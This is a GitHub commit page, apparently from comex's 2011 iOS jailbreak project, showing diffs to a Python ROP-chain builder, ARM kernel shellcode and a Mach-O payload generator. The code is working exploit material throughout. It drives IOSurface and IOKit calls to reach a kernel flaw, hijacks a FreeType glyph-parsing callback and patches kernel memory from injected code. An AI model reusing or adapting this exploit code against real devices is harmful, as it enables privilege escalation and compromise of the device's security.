*sigh*

comex · Mar 28, 2011 · 50f4a0f · 50f4a0f
1 parent f29c944
commit 50f4a0f
Show file tree

Hide file tree

Showing 4 changed files with 58 additions and 62 deletions.
diff --git a/catalog/catalog.py b/catalog/catalog.py
@@ -32,14 +32,14 @@ def dbg_result():
         back = sys._getframe().f_back
         funcall('_printf', ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result)
 
+dmini.init(cachefile, True)
 
 dmini.init(kernfile, False)
 
 code_addr = 0x80000400 # XXX
-weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-8]
+weirdfile = dmini.Connection('kcode.o', rw=True).relocate(dmini.cur, code_addr).nth_segment(0)[:-4]
 count = 0
 stuff = ''
-kreturn = pointed('')
 while True:
     namelen = patchfp.read(4)
     if len(namelen) == 0: break
@@ -51,7 +51,7 @@ def dbg_result():
         continue
     stuff += I(addr, len(data)) + data
     count += 1
-weirdfile = pointed(weirdfile + I(count, pointer(kreturn)) + stuff)
+weirdfile = pointed(weirdfile + I(count) + stuff)
 init('R4', 'R5', 'R6', 'R7', 'PC', pic=True)
 funcall('_copyin', pointer(weirdfile), code_addr, len(weirdfile))
 set_fwd('PC', code_addr)
@@ -91,11 +91,10 @@ def wrap(num):
 if mode == 'dejavu' and four_dot_three:
     p_1000, _1000 = stackunkpair()
     p_100c, _100c = stackunkpair()
-    funcall('_dyld_get_image_header', 0)
+    funcall('__dyld_get_image_header', 0)
     store_r0_to(p_1000)
     add_r0_by(0xc)
     store_r0_to(p_100c)
-
 else:
     p_1000 = ptrI(0x1000)
     _1000 = 0x1000
@@ -121,8 +120,9 @@ def wrap(num):
     funcall('_munmap', p_1000, 0x1000, load_r0=True); dbg_result()
     funcall('_mmap', p_1000, 0x1000, 3, 0x1001, 0, load_r0=True); dbg_result()
 
-funcall('_memcpy', p_1000, ptr(kstuff), len(kstuff), load_r0=True)
 funcall('_mlock', p_1000, 0x1000, load_r0=True); dbg_result()
+memcpy = '_memcpy$VARIANT$CortexA8' if four_dot_three else '_memcpy'
+funcall(memcpy, p_1000, ptr(kstuff), len(kstuff), load_r0=True)
 
 funcall('iosurface._IOSurfaceWrapClientImage', 1, _100c, 0x41424752, 4, 0x40000, 0);
 if mode == 'dejavu':
@@ -143,15 +143,11 @@ def wrap(num):
 connect = ptrI(0)
 funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result()
 
+dbg_result(); funcall('_abort')
+
 js = ptrI(surface_id, 0, 9 if four_dot_three else 8, 0)
 funcall('iokit._IOConnectCallScalarMethod', connect, 1, js, 2, 0, 0, load_r0=True)
 
-clear_fwd() # we're not coming back the usual way
-heapadd(kreturn, fwd('PC'))
-fwd('R7')
-set_sp_to_sp()
-make_avail()
-
 # do some housekeeping
 # (but don't bother if we're going to exec)
 if mode == 'dejavu':
@@ -197,7 +193,8 @@ def wrap(num):
     set_r0_to(1337)
     fancy_set_sp_to(reloc(0xe, 0x60c)) # offset determined by experiment
 else:
-    funcall('_execl', ptr('/sbin/lunchd', True), 0)
+    lunchd = ptr('/sbin/lunchd', True)
+    funcall('_execl', lunchd, lunchd, 0)
 
 goo.sheap.append(pad(weirdfile, 4))
 
@@ -207,7 +204,6 @@ def wrap(num):
 
     # add sp, #400; pop {r4, r5, pc}
     parse_callback = dmini.cur.find_basic('+ 64 b0 30 bd').value
-    print hex(parse_callback)
     actual_parse_callback = dmini.cur.private_sym('ft._T1_Parse_Glyph').value
 
     final = final.unpack()

diff --git a/catalog/kcode.S b/catalog/kcode.S
@@ -1,11 +1,9 @@
 .syntax unified
 .arm
 start:
-    mrc p15, 0, sp, c13, c0, 4
-    ldr sp, [sp, #0x54]
-    add sp, #0x3000
-
-    ldrd r6, r7, count
+    sub r7, sp, #(56 - 0xc)
+    add sp, pc, #0xa00
+    ldr r6, count
     adr r5, stuff
 pf_loop:
 
@@ -23,20 +21,15 @@ pf_loop:
     subs r6, #1
     bne pf_loop
 
-    bl _current_proc
-    bl _proc_unlock
-    bl _current_proc
-    bl _proc_ucred
-    str r6, [r0, #0xc]
-
-#ifdef __ARM_ARCH_7A__
-    mov r5, #0x30
-#else
-    mov r5, #0x10
-#endif
-    msr spsr, r5 
-    ldm r7!, {pc}^
+    mrc p15, 0, sp, c13, c0, 4
+    ldr sp, [sp, #0x54]
+sp_loop:
+    ldr r0, [sp], #4
+    cmp r0, r7
+    bne sp_loop
+
+    add sp, #(9*4)
+    pop {r4-r7, pc}
 
 count: .long 0
-addr: .long 0
 stuff:
diff --git a/data b/data
diff --git a/goo/two.py b/goo/two.py
@@ -59,7 +59,13 @@ def command(cmd, stuff):
     commands.append(I(cmd, len(stuff) + 8))
     commands.append(stuff)
 
+reloc_base = None
+
 def segment(segname, vmaddr, vmsize, data, maxprot, initprot, sects=[]):
+    global reloc_base
+    # dumb, but that's the spec!
+    if reloc_base is None: reloc_base = vmaddr
+
     length = len(data)
     if vmsize is None: vmsize = (length + 0xfff) & ~0xfff
     offset = len(segments)
@@ -112,7 +118,7 @@ def import_sym(ordinal, name, subtract=0):
         strx,
         0, # n_type = N_UNDF
         0, # n_sect is ignored?
-        ordinal << 8, # n_desc
+        (ordinal + 1) << 8, # n_desc
         subtract, # n_value (with prebound set, this is subtracted)
     )
     return len(symtab) / 12 - 1
@@ -125,36 +131,37 @@ def reloc(sym, address):
     r_type = 0
 
     relocs += I(
-        address,
+        (address - reloc_base) & 0xffffffff,
         (r_type << 28) |
         (r_extern << 27) |
-        (r_length << 26) |
+        (r_length << 25) |
         (r_pcrel << 24) |
         sym)
 
+segment('__LINKEDIT', 
+    linkedit_address,
+    linkedit_size,
+    linkedit,
+    PROT_READ | PROT_WRITE,
+    PROT_READ | PROT_WRITE,
+    [{'sectname': '__init',
+      'offset': pointer(initializer),
+      'size': 4,
+      'flags': 0x9, # S_MOD_INIT_FUNC_POINTERS
+      }]
+)
+
 libs = {}
 for path in data['libs']:
     libs[path] = load_dylib(path, 0, 0, 0x010000)
-sym = import_sym(libs['/usr/lib/libSystem.B.dylib'], '_getpid', subtract=dmini.cur.sym('_getpid'))
+sym = import_sym(libs['/usr/lib/libSystem.B.dylib'], '_getpid', subtract=dmini.cur.sym('_getpid')&~1)
 for addr in rop_relocs:
     reloc(sym, addr)
 
 symtab = pointed(symtab)
 relocs = pointed(relocs)
 strtab = pointed(strtab)
 
-command(0xb, I( # LC_DYSYMTAB
-    0, 0, # localsym
-    0, 0, # extdefsym
-    0, len(symtab) / 12, # undefsym
-    0, 0, # toc
-    0, 0, # modtab
-    0, 0, # extrefsym
-    0, 0, # indirectsym
-    pointer(relocs), len(relocs) / 8, # extrel
-    0, 0, # locrel
-))
-
 command(2, I( # LC_SYMTAB
     pointer(symtab), # symoff
     len(symtab) / 12, # nsyms
@@ -167,18 +174,18 @@ def reloc(sym, address):
 linkedit_rest.append(relocs)
 linkedit_rest.append(strtab)
 
-segment('__LINKEDIT', 
-    linkedit_address,
-    linkedit_size,
-    linkedit,
-    PROT_READ | PROT_WRITE,
-    PROT_READ | PROT_WRITE,
-    [{'sectname': '__init',
-      'offset': pointer(initializer),
-      'size': 4,
-      'flags': 0x9, # S_MOD_INIT_FUNC_POINTERS
-      }]
-)
+command(0xb, I( # LC_DYSYMTAB
+    0, 0, # localsym
+    0, 0, # extdefsym
+    0, len(symtab) / 12, # undefsym
+    0, 0, # toc
+    0, 0, # modtab
+    0, 0, # extrefsym
+    0, 0, # indirectsym
+    pointer(relocs), len(relocs) / 8, # extrel
+    0, 0, # locrel
+))
+
 
 segment('__ROP',
     rop_address,